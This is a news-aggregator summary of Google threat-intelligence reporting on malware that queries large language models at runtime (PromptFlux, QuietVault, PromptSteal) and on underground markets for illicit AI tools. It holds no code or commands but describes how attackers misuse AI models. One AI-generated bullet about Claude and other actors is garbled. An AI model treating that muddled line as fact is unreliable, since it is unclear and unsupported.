Published • loading... • Updated
Google Warns Criminals Are Building and Selling Illicit AI Tools - and the Market Is Growing
Google's Threat Intelligence Group found AI-powered malware using large language models to dynamically alter code, aiding sophisticated evasion in real-world attacks in 2025.
- On Wednesday, Google's Threat Intelligence Group warned that malware can connect to large language models to refine attacks in real time, describing a 'just-in-time' self-modification technique.
- Researchers found growing demand in underground marketplaces as developers aggressively promote AI features with API and Discord access, accelerating availability of malicious services on English and Russian-speaking underground marketplaces.
- PromptFlux periodically queried Gemini via a 'Thinking Robot' module to create obfuscated VBScript, QuietVault used AI CLI prompts to find secrets, and PromptSteal queried Qwen in Ukraine.
- Google disabled accounts and assets, reinforced Gemini safeguards, and faced skepticism from Marcus Hutchins, who said, `It doesn't specify what the code block should do, or how it's going to evade an antivirus.`
- These cases suggest a broader shift in how adversaries use LLMs, with Masan, Iranian groups, and Anthropic's Claude AI chatbot involved in cross-company threats.
Insights by Ground AI
15 Articles
15 Articles
Reposted by
BizToc
Google warns of new AI-powered malware families deployed in the wild
Google's Threat Intelligence Group (GTIG) has identified a major shift this year, with adversaries leveraging artificial intelligence to deploy new malware families that integrate large language models (LLMs) during execution. [...]
Coverage Details
Total News Sources15
Leaning Left2Leaning Right0Center2Last UpdatedBias Distribution50% Left, 50% Center
Bias Distribution
- 50% of the sources lean Left, 50% of the sources are Center
50% Center
L 50%
C 50%
Factuality
To view factuality data please Upgrade to Premium









